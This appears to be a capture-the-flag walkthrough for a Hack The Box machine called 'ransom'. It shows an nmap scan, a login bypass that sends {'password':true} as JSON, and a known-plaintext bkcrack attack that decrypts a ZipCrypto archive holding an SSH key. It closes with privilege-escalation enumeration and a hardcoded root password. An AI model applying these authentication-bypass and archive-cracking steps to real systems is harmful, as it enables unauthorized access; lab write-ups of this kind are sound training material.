# Enumeration
#### nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ea:84:21:a3:22:4a:7d:f9:b5:25:51:79:83:a4:f5:f2 (RSA)
| 256 b8:39:9e:f4:88:be:aa:01:73:2d:10:fb:44:7f:84:61 (ECDSA)
|_ 256 22:21:e9:f4:85:90:87:45:16:1f:73:36:41:ee:3b:32 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: Admin - HTML5 Admin Template
|_Requested resource was http://10.10.11.153/login
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
# Authentication Bypass
when you inspect the header of the request you see that it uses a GET request to the api/login but if you change the request to post it changes the error message and the body of the message.
Using GET request with POST parameter body as application/json
{"password":true} will return login success. Reloading the page will log you in.
# Reverse shell
there are two files a zip and a user.txt flag.
The zip is password protected so I am bruteforcing it:
┌──(root💀kali)-[~/Downloads]
└─# zip2john uploaded-file-3422.zip > zip.uploaded 130 ⨯
ver 2.0 efh 5455 efh 7875 uploaded-file-3422.zip/.bash_logout PKZIP Encr: 2b chk, TS_chk, cmplen=170, decmplen=220, crc=6CE3189B
ver 2.0 efh 5455 efh 7875 uploaded-file-3422.zip/.bashrc PKZIP Encr: 2b chk, TS_chk, cmplen=1752, decmplen=3771, crc=AB254644
ver 2.0 efh 5455 efh 7875 uploaded-file-3422.zip/.profile PKZIP Encr: 2b chk, TS_chk, cmplen=404, decmplen=807, crc=D1B22A87
ver 1.0 uploaded-file-3422.zip/.cache/ is not encrypted, or stored with non-handled compression type
ver 1.0 efh 5455 efh 7875 uploaded-file-3422.zip/.cache/motd.legal-displayed PKZIP Encr: 2b chk, TS_chk, cmplen=12, decmplen=0, crc=0
ver 1.0 efh 5455 efh 7875 uploaded-file-3422.zip/.sudo_as_admin_successful PKZIP Encr: 2b chk, TS_chk, cmplen=12, decmplen=0, crc=0
ver 1.0 uploaded-file-3422.zip/.ssh/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 uploaded-file-3422.zip/.ssh/id_rsa PKZIP Encr: 2b chk, TS_chk, cmplen=1990, decmplen=2610, crc=38804579
ver 2.0 efh 5455 efh 7875 uploaded-file-3422.zip/.ssh/authorized_keys PKZIP Encr: 2b chk, TS_chk, cmplen=475, decmplen=564, crc=CB143C32
ver 2.0 efh 5455 efh 7875 uploaded-file-3422.zip/.ssh/id_rsa.pub PKZIP Encr: 2b chk, TS_chk, cmplen=475, decmplen=564, crc=CB143C32
ver 2.0 efh 5455 efh 7875 uploaded-file-3422.zip/.viminfo PKZIP Encr: 2b chk, TS_chk, cmplen=581, decmplen=2009, crc=396B04B4
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
┌──(root💀kali)-[~/Downloads]
└─# john --format=pkzip zip.uploaded 1 ⨯
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 3 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Proceeding with incremental:ASCII
the attack was unsuccessful. I found this on medium:
https://medium.com/@whickey000/how-i-cracked-conti-ransomware-groups-leaked-source-code-zip-file-e15d54663a87z apparently can be used to extract a lot of info about hte contents:
┌──(root💀kali)-[~/Downloads]
└─# 7z l -slt uploaded-file-3422.zip|less
Path = .bash_logout
Folder = -
Size = 220
Packed Size = 170
Modified = 2020-02-25 08:03:22
Created =
Accessed =
Attributes = _ -rw-r--r--
Encrypted = +
Comment =
CRC = 6CE3189B
Method = ZipCrypto Deflate
Host OS = Unix
Version = 20
Volume Index = 0
The encryption method is ZipCrypto and the hash to confirm the result is CRC. The attack used here will only work against ZipCrypto. The attack involves finding a file with the same text as any file in the archive, and abusing that to recover the entire archive, and potentially even the password.
First we will compare two files one from my local kali and one from the archive by comparing the hash: In this case i am comparing .bash_logout because the file is rarely changed and it's 220 kb just as the file from the archive.
┌──(root💀kali)-[~/Downloads]
└─# python3
Python 3.9.2 (default, Feb 28 2021, 17:03:44)
[GCC 10.2.1 20210110] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import binascii
>>> with open('/home/kali/.bash_logout', 'rb') as f:
... data = f.read()
...
>>> data
b'# ~/.bash_logout: executed by bash(1) when login shell exits.\n\n# when leaving the console clear the screen to increase privacy\n\nif [ "$SHLVL" = 1 ]; then\n [ -x /usr/bin/clear_console ] && /usr/bin/clear_console -q\nfi\n'
>>> hex(binascii.crc32(data) & 0xFFFFFFFF)
'0x6ce3189b'
>>>
we see that the two files crc32 is exactly the same = "0x6ce3189b"
1. make a copy of your local .bash_logout
┌──(root💀kali)-[/home/kali]
└─# cp .bash_logout bash_logout
2. zip the copy under the name of plain.zip
┌──(root💀kali)-[/home/kali]
└─# zip plain.zip bash_logout
adding: bash_logout (deflated 28%)
3. use bkcrack to retrieve the keys
┌──(root💀kali)-[/home/kali]
└─# /opt/bkcrack/install/bkcrack -C ~/Downloads/uploaded-file-3422.zip -c .bash_logout -P plain.zip -p bash_logout 1 ⨯
bkcrack 1.3.5 - 2022-03-23
[11:10:29] Z reduction using 150 bytes of known plaintext
100.0 % (150 / 150)
[11:10:30] Attack on 57097 Z values at index 7
Keys: 7b549874 ebc25ec5 7e465e18
78.6 % (44881 / 57097)
[11:11:54] Keys
7b549874 ebc25ec5 7e465e18
4. use bkcrack with the retrieved keys to create a copy of the protected zip and assign it new pass.
┌──(root💀kali)-[/home/kali]
└─# /opt/bkcrack/install/bkcrack -C ~/Downloads/uploaded-file-3422.zip -k 7b549874 ebc25ec5 7e465e18 -U new-pass-file.zip 1234
bkcrack 1.3.5 - 2022-03-23
[11:15:30] Writing unlocked archive new-pass-file.zip with password "1234"
100.0 % (9 / 9)
Wrote unlocked archive.
5. unzip the new file with the new password:
┌──(root💀kali)-[/home/kali]
└─# unzip new-pass-file.zip
Archive: new-pass-file.zip
[new-pass-file.zip] .bash_logout password:
replace .bash_logout? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
inflating: .bash_logout
replace .bashrc? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
inflating: .bashrc
replace .profile? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
inflating: .profile
extracting: .cache/motd.legal-displayed
extracting: .sudo_as_admin_successful
creating: .ssh/
inflating: .ssh/id_rsa
inflating: .ssh/authorized_keys
inflating: .ssh/id_rsa.pub
inflating: .viminfo
ssh with the id_rsa as user htb ( you can see htb user in id_rsa.pub)
# Privesc
╔══════════╣ Searching passwords in config PHP files
'password' => 'P@ssw0rd1!',
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strings Not Found
-rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 39K Mar 7 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 163K Jan 19 2021 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 44K Jul 14 2021 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 67K Feb 7 13:33 /usr/bin/su
-rwsr-xr-x 1 root root 55K Feb 7 13:33 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 39K Feb 7 13:33 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 84K Jul 14 2021 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 52K Jul 14 2021 /usr/bin/chsh
-rwsr-xr-x 1 root root 87K Jul 14 2021 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 67K Jul 14 2021 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 31K Feb 21 12:58 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.31
Vulnerable to CVE-2021-3560
because the website parses the password in the url it probably saves logs somewhere and makes comparisson somewhere locally, so i searched for invalid password in:
htb@ransom:~$ cd /srv/prod
htb@ransom:/srv/prod$ grep -r "Invalid Password"
app/Http/Controllers/AuthController.php: return "Invalid Password";
next i analyse the file authcontroller.php
htb@ransom:/srv/prod$ cat app/Http/Controllers/AuthController.php
[....snip.....]
if ($request->get('password') == "UHC-March-Global-PW!") {
session(['loggedin' => True]);
return "Login Successful";
}
return "Invalid Password";
}
The password is UHC-March-Global-PW!
htb@ransom:/srv/prod$ su root
Password:
root@ransom:/srv/prod# whoami
root
```
0 Comments
Recommended Comments
Няма коментари